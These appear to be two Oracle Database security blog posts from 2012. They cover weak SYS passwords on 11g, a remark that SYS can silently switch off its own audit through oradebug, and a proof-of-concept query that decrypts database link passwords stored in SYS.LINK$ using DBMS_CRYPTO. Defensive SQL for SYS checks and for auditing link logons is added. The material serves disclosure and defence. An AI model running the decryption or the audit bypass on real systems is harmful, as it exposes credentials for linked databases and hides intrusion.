The SELECT on ku$_dblink_view via SELECT_CATALOG_ROLE is fixed in 11.2.0.3 and above, as is the "stealth password cracking vulnerability" which has gained a lot of attention and resulted in updates to John and Ettercap.

So which account would be the likely target of this stealth attack? …
The only account that is guaranteed to be present and unlocked is SYS..
For both the stealth brute force and my orabrute-style brute force, the primary defence is the strength of the SYS password.
If the SYS password is a 15-character passphrase that is changed regularly, then the attacks are ineffective. So how do we ensure the SYS password is complex and the account is secure?
The problem is that SYS is immune to profiles in 11g, so there is no password history, no account locking, no failed logon delay and, crucially, no password complexity function.
The SYS password could be 'a' and no one else would be any the wiser.

[oracle@localhost ~]$ sqlplus sys/lowsec@localhost/orcl as sysdba

SQL*Plus: Release 11.2.0.2.0 Production on Wed Nov 28 20:40:57 2012

Copyright (c) 1982, 2010, Oracle.  All rights reserved.


Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> alter user sys identified by a;

User altered.

SQL> alter user system identified by a;
alter user system identified by a
*
ERROR at line 1:
ORA-28003: password verification for the specified password failed
ORA-20001: Password length less than 8

The DBA might not even realise the password is 'a' if they are coming in through Unix "/ as sysdba".
SYS can even silently turn off its own audit through oradebug, so there is no record of the attack either.
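Since profiles cannot enforce anything on SYS in 11g, the checks below are an added example (not from the original post) of what a DBA can still verify: how old the SYS and SYSTEM passwords are, whether remote "AS SYSDBA" logons are possible at all, whether SYS's own statements are being audited to the OS, and which accounts share SYS's profile immunity through the password file. It assumes SYSDBA access, the SYS.USER$.PTIME column (password change time) and the standard parameter names; the 90-day window is a policy value chosen here.

```sql
-- Added example, not from the original post: compensating checks for SYS on 11g.
-- Assumes SYSDBA access; PTIME is the password change time in SYS.USER$.  The
-- 90-day threshold is a chosen policy value.

-- 1. Age of the SYS and SYSTEM passwords.  Nothing forces rotation for SYS, so
--    the finding is simply "older than policy".
SELECT name,
       ptime                                                       AS password_changed,
       TRUNC(SYSDATE - ptime)                                      AS age_days,
       CASE WHEN SYSDATE - ptime > 90 THEN 'ROTATE' ELSE 'OK' END  AS verdict
FROM   sys.user$
WHERE  name IN ('SYS', 'SYSTEM');

-- 2. Remote SYSDBA surface and SYS auditing.
--    REMOTE_LOGIN_PASSWORDFILE=NONE leaves only OS-authenticated (local) SYSDBA
--    logons, which removes the remote brute-force surface at the cost of
--    remote SYSDBA administration.  AUDIT_SYS_OPERATIONS=TRUE writes SYS's
--    statements to the OS audit trail, where oradebug cannot turn them off
--    from inside the session the way it can for the database trail.
SELECT name, value
FROM   v$parameter
WHERE  name IN ('remote_login_passwordfile', 'audit_sys_operations', 'audit_trail')
ORDER  BY name;

-- 3. Every account in the password file: each one can be attacked remotely
--    with "AS SYSDBA" and is as immune to profiles as SYS itself.
SELECT username, sysdba, sysoper
FROM   v$pwfile_users
ORDER  BY username;
```

None of this makes a weak SYS password strong; it makes the age of the password and the size of the remote SYSDBA surface visible, which is the part that otherwise goes unnoticed when the DBA always connects with "/ as sysdba".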

So SYS really is “special”, but will this improve in 12c…? Answers at UKOUG.

Cheers,
Paul

Database Link Security

Hello Oracle Security folks,

Good news and bad news – which would you like first?

OK, so the bad news is that these users/roles/privileges can select and decrypt DB link passwords on 11.2, as the key to decrypt the ciphertext is included in the password itself:
- SYS
- SYSDBA
- DBA
- SYS WITHOUT SYSDBA
- SYSASM
- EXP_FULL_DATABASE
- DATAPUMP_EXP_FULL_DATABASE
- DATAPUMP_IMP_FULL_DATABASE

PoC:

SQL> CREATE DATABASE LINK "TEST_LINK" CONNECT TO "DBLINK_ACCOUNT" IDENTIFIED BY MYPW USING '(DESCRIPTION=(ADDRESS_LIST=(ADDRESS =(PROTOCOL=TCP)(HOST=192.168.0.25)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=ORCL11)))';

Database link created.

SQL> select name, userid, passwordx from sys.link$ where name='TEST_LINK';
NAME
--------------------------------------------------------------------------------
USERID
------------------------------
PASSWORDX
--------------------------------------------------------------------------------
TEST_LINK
DBLINK_ACCOUNT
058CC531A7BBC08390C066B29CB2E26AF1

SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) from sys.link$ where name='TEST_LINK';

NAME
--------------------------------------------------------------------------------
USERID
------------------------------
PASSWORD
--------------------------------------------------------------------------------
TEST_LINK
DBLINK_ACCOUNT
MYPW

The above issue did not make my Top 10 New Oracle Security Issues which I will publish at UKOUG 2012 on Monday http://2012.ukoug.org/default.asp?p=9339&dlgact=shwprs&prs_prsid=7736&day_dayid=62.

So the good news is that Oracle audit trail does now highlight incoming DBLink activity including the name of the link from the client database.

SQL> select userid, ntimestamp#, userhost, comment$text from sys.aud$ where comment$text like 'DBLINK%';

USERID          NTIMESTAMP#                   USERHOST  COMMENT$TEXT
--------------  ----------------------------  --------  -------------------------------------------------
DBLINK_ACCOUNT  19-NOV-12 01.42.16.305194000  orlin     DBLINK_INFO: (SOURCE_GLOBAL_NAME=orcl.4294967295)
DBLINK_ACCOUNT  19-NOV-12 01.42.17.086395000  orlin     DBLINK_INFO: (SOURCE_GLOBAL_NAME=orcl.4294967295)
DBLINK_ACCOUNT  19-NOV-12 01.42.17.086856000  orlin     DBLINK_INFO: (SOURCE_GLOBAL_NAME=orcl.4294967295)

This DBLINK_INFO is very useful, and the attached paper expands a little on the subject of DB link security, including forensic response. More to come at UKOUG in Birmingham.
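To make those DBLINK_INFO records actionable, here is an added example (not from the original post) that parses the source database and link name out of COMMENT$TEXT and reports incoming link logons per remote account, source and client host, marking any source that is not on an allow-list. It assumes 11g traditional auditing (AUDIT_TRAIL=DB, with AUDIT SESSION enabled so logons are recorded), the SYS.AUD$ columns used above, and an allow-list table created here with one constructed entry; both the DWH_PROD-style entry and the table name are placeholders.

```sql
-- Added example, not from the original post: per-source report of incoming
-- database link logons from SYS.AUD$.  Assumes 11g with AUDIT_TRAIL=DB and the
-- AUD$ columns USERID, USERHOST, NTIMESTAMP#, COMMENT$TEXT.  The allow-list
-- table and its single row are constructed placeholders.

-- 1. Logon auditing is what produces the DBLINK_INFO comment on the target DB.
AUDIT SESSION BY ACCESS;

-- 2. Sources expected to open links into this database (constructed value;
--    replace with the real SOURCE_GLOBAL_NAME values seen in the audit trail).
CREATE TABLE expected_dblink_sources (source_global_name VARCHAR2(128) PRIMARY KEY);
INSERT INTO expected_dblink_sources VALUES ('DWH_PROD');
COMMIT;

-- 3. Parse SOURCE_GLOBAL_NAME and (where present, 11.2.0.3+/12c) DBLINK_NAME out
--    of the comment, then aggregate and mark unexpected sources.
WITH incoming AS (
  SELECT userid,
         userhost,
         ntimestamp#,
         REGEXP_SUBSTR(comment$text, 'SOURCE_GLOBAL_NAME=([^,)]+)', 1, 1, NULL, 1) AS source_global_name,
         REGEXP_SUBSTR(comment$text, 'DBLINK_NAME=([^,)]+)',        1, 1, NULL, 1) AS dblink_name
  FROM   sys.aud$
  WHERE  comment$text LIKE 'DBLINK_INFO%'
)
SELECT i.userid,
       i.source_global_name,
       i.dblink_name,
       i.userhost,
       COUNT(*)           AS logons,
       MIN(i.ntimestamp#) AS first_seen,
       MAX(i.ntimestamp#) AS last_seen,
       CASE WHEN e.source_global_name IS NULL THEN 'UNEXPECTED SOURCE' ELSE 'expected' END AS verdict
FROM   incoming i
LEFT   JOIN expected_dblink_sources e
  ON   UPPER(e.source_global_name) = UPPER(i.source_global_name)
GROUP  BY i.userid, i.source_global_name, i.dblink_name, i.userhost, e.source_global_name
ORDER  BY verdict, last_seen DESC;
```

Run against the three records shown above, the report gives one row for DBLINK_ACCOUNT from source orcl.4294967295 on host orlin with three logons, a NULL link name (the 11.2.0.2 comment carries no DBLINK_NAME), and the verdict UNEXPECTED SOURCE until that source is added to the allow-list. On 12c with unified auditing the same information comes from the unified trail rather than SYS.AUD$, so the FROM clause needs changing there.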

Cheers,
Paul